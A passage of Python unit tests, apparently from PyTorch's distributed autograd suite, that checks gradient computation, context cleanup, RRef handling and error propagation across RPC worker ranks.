dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
        # it is possible that the response could require grad.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
    # ps = rank1 with trainers = rank2/3/0
    # ps = rank2 with trainers = rank3/0/1
    # ps = rank3 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
for fut in futures:
fut.wait()
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO, need more investigation
# there is rref leak when shutting down, suspect it is because
# ref as arg is passed to pybind boundary, and the ref is not garbage
# collected by python when calling shutdown()
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.chain_matmul, [val, t3, t4])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.chain_matmul, [t1, t2, t3])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of an RPC function, as a result the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(timedelta(milliseconds=5000))
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = get_shutdown_error_regex(dist_utils.TEST_CONFIG.rpc_backend_name)
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.chain_matmul(t1, t2, t3, t4, t5)
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.chain_matmul(t1, t2, t3, t4)
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.chain_matmul(t1, t2, res)
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@staticmethod
def _set_backward_done():
DistAutogradTest._backward_done = True
@staticmethod
def _wait_backward_done():
while not DistAutogradTest._backward_done:
time.sleep(0.1)
@dist_init(clean_shutdown=False)
@unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/35099")
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(timedelta(milliseconds=5000))
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = get_shutdown_error_regex(dist_utils.TEST_CONFIG.rpc_backend_name)
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Tell other nodes RPC is done.
for i in range(self.world_size):
if i != self.rank and i != 2:
# Due to non-graceful shutdown of workers, this RPC may not return successfully.
# For example, the destination worker could process the RPC, exit and begin shutdown, and
# shutdown RPC before responding and satisfying this RPC. Therefore, we swallow possible errors here.
try:
rpc.rpc_sync(
"worker{}".format(i),
DistAutogradTest._set_backward_done,
args=(),
)
except Exception as e:
pass
else:
# Wait for backward to finish on rank 0.
DistAutogradTest._wait_backward_done()
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.chain_matmul(t1, t2, t3, t4, res)
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.chain_matmul(t1, t2, t3, t4, res).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
